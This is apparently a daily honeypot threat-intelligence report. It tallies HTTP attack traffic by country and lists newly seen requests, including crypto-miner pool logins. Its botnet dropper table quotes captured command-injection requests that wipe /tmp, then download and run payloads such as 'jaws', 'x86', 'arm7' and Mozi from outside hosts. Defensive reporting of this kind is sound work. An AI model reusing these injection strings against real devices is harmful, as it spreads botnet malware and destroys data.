Daily Report: 2025-07-22#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 6 stage 1 IP address(es), linked to 4 dropper URL(s).
There are 6 new requests that have never been observed before (these were added to the monitored request database.).
A total of 511 requests were recorded during the day, originating from 6 different countries, with a peak of 113 requests coming from GB.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
8.222.162.163 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.222.167.136 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
45.135.194.11 | GET /cgi-bin/shortcut_telnet.cgi?wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.gigatex.sh%7Csh%3B HTTP/1.1 |
45.153.34.79 | GET /shell?cd+/tmp;rm+-rf+arm7;nohup+wget+http:/\x5C/45.125.66.95/x86;chmod+777+x86;./x86;cd+/tmp;rm+-rf+arm7;nohup+wget+http:/\x5C/45.125.66.95/arm7;chmod+777+arm7;./arm7 HTTP/1.1 |
8.219.208.212 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
125.47.196.217 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.47.196.217:34359/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
109 | 1 | {\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2244VA89LzxY3CcUKUtxTcrk6Zz1fS3tV6aGyJJmYY1o9iiUmyjmWDGTb2ekCFjPRqaSXWpf1AiDKnZ2JwTpZbq2c67Fsyh8m\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}} |
114 | 1 | {\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x5ca06400e508b0177566d4d3dea0828a5d9b0473\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22} |
125 | 1 | \x00\x0E8\xAFz\x8C\x22\xC0\xA4k3\x00\x00\x00\x00\x00 |
189 | 1 | \x00\x0E\x08\x9B\x8F*n\x81\x1C6N\x00\x00\x00\x00\x00 |
200 | 1 | \x00\x0E8\x9B\x8F*n\x81\x1C6N\x00\x00\x00\x00\x00 |
222 | 1 | \x00\x0E8\xB7\xA4F\xF1v\x91\x09\x04\x00\x00\x00\x00\x00 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 113 | GB |
1 | 107 | US |
2 | 73 | NL |
3 | 28 | FR |
4 | 18 | DE |
5 | 18 | CA |
6 | 17 | JP |
7 | 17 | BG |
8 | 16 | PL |
9 | 15 | ES |
10 | 13 | SG |
11 | 13 | SC |
12 | 12 | RO |
13 | 9 | CN |
14 | 6 | BE |
15 | 6 | MU |
16 | 5 | PT |
17 | 5 | IN |
18 | 3 | RU |
19 | 3 | HK |
20 | 3 | KZ |
21 | 2 | IT |
22 | 2 | ZA |
23 | 1 | CH |
24 | 1 | AR |
25 | 1 | KR |
26 | 1 | AE |
27 | 1 | LT |
28 | 1 | TR |
29 | 1 | CO |